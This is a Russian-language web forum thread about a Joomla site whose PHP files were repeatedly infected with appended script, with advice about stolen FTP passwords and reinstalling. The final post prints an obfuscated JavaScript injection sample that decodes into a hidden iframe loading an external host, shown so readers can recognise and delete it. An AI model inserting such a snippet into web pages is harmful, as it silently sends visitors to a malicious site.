Сайт умер благодая вредоносной програме или хакерам...

С непонятных причин сайт не стал загружаться. Стал выдавать – «не может парсировать в центральном ,так сказать, index.php строку 85. Залез в файл – смотрю, в конце файла кусок скрипта огромный добавлен – у меня был этот файл не подпорченный. Я удалил кусок лишнего кода и всё заработало. Это было месяц назад. Сегодня та же ситуация, но удаление лишнего кода не помогло, так как заразились и некоторые другие файлы. В админку я кое-как зашел, ну а толку с того. Но у моего знакомого тоже сайт глюконул как точно же, как и у меня, но выдало такое – что может вы заходили на сайт besloqawe.ком (ком – пишу на русском, что бы вы туда не ходили). Ну и короче он вас, может заразил. Это может быть вредоносная программа и вполне возможно, что он недавно был взломан хакерами… Это гугл обнаружил такую проблему. Если это действительно вредоносная программа или хакеры – что делать? Снести жумлу, сменить пароли? Это что-то даст?

 

Почитайте на форуме, обсуждалось много раз

 

Тем похожих много, но ничего конкретного для меня я не нашел... Если это вредоносная програма, которая скрипты в конци php файлов дописывает, то где эта тварь сидит? - на сервере? Тогда куда хостер смотрит. Если это хакеры - то как от них спастись - сменить жумлу (так как она уже запорчена) и сменить по возможности пароли?

 

мда... а я то думал, что мне погогут с гадами...

 

Коль мне никто не помагает - пришлось в полуживой админ панели написать приветствие, если кто хочет почитать, Заходите, welcome to http://www.kovbasa.net/ .Я выживу...

 

Вернее всего, на 99% ваши пароли от фтп были унесены вирем (забираются из клиента фтп). Меняйте пароли на фтп, база как правило остается не задетой. Заливайте поверху чистую джумлу и смотрите

 

Спасибо Asylum. Не буду вникать в подробности, но похоже, что Вы правы, это фтп. Он настроен у меня через тотал командер, но имя и пароль я в тотале не храню, а каждий раз ввожу руками, так как же оно ворует? И второе - а что делать, вообще отказаться от фтп как такового?

 

Без фтп жить не удобно, первое, это поменять пароли. Иначе сайт можно будет заливать до бесконечности

 

Да хостинг то платный, сервер в США. Вчера знакомому снесли верд прес и стали жумлу ставить по фтп. До этого по фтп с его сайтом никто не ковырялся!!!! Только поставили - смотрю, те же ошибки, захожу в файл его - тоже кусок левого кода висит - удалил нафиг и сайт заработал. Но не надолго, в некоторых других файлах этот код добавится! Я понял, что бессилен и снесли всё, хорошо, что у него база пустая, терять вроде как нечего. Щас он поменял фтр пароль и ставим заново. А я благодаря тому, что файл базы вчера сохранил, немного помучившись без привычки ВОССТАНОВИЛ САЙТ с Божьей помощю ну и Вашей. Спасибо. Всем.!

 

есть такой скрипт можно вставить после index.php и заразить сайты на джумла.. но по моему эт проблема решено после версии 1.5.15

скрипт такой: между <script>и</script> такой код:var source ="=jgsbnf!tsd>#iuuq;00svtsn/dpn0dpvoufs0hp/qiq@tje>2#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
смотрите есть ли у вас на сайте такой код? или похожий на это.
ВНИМАНИЕ!! НИКОМУ НЕ СОВЕТУЮ СКОПИРОВАТЬ ЭТОТ КОД НА КОМП ИЛИ КУДА ТО МЕЖДУ ТЕГАМИ <script>и</script> ВАШ КОМП МОЖЕТ ЗАРАЗИТСЯ!!
если увидите такое просто стерите из файла